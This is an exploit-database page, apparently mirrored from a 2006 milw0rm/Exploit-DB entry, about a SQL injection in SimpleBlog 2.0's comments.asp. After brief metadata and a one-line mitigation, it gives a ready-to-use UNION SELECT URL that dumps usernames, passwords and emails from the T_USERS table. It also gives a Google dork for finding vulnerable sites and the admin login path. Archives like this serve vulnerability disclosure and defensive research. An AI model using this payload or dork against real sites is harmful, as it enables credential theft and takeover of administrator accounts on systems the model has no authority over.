SimpleBlog 2.0 - exploit.company

vendor:

SimpleBlog 2.0

by:

Chironex Fleckeri

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: SimpleBlog 2.0

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: 2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit

A vulnerability in SimpleBlog 2.0 <= "comments.asp" allows an attacker to inject arbitrary SQL commands. This can be exploited to manipulate SQL queries by e.g. injecting additional statements. This can be used to bypass authentication or disclose sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

################################################################################
##                                                                            ##

##  SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit                    ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##

##  Credit by        |  Chironex Fleckeri                                     ##

##  Mail             |  ChironeX.FleckeriX@Gmail.Com                          ##

##  Googledork       |  Powered By SimpleBlog 2.0                             ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##

##                                                                            ##
################################################################################

############################################################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
############################################################################################################################################################

###########################################################
#Admin Panel : http://www.target.com/path/admin/login.asp #
###########################################################

# milw0rm.com [2006-08-20]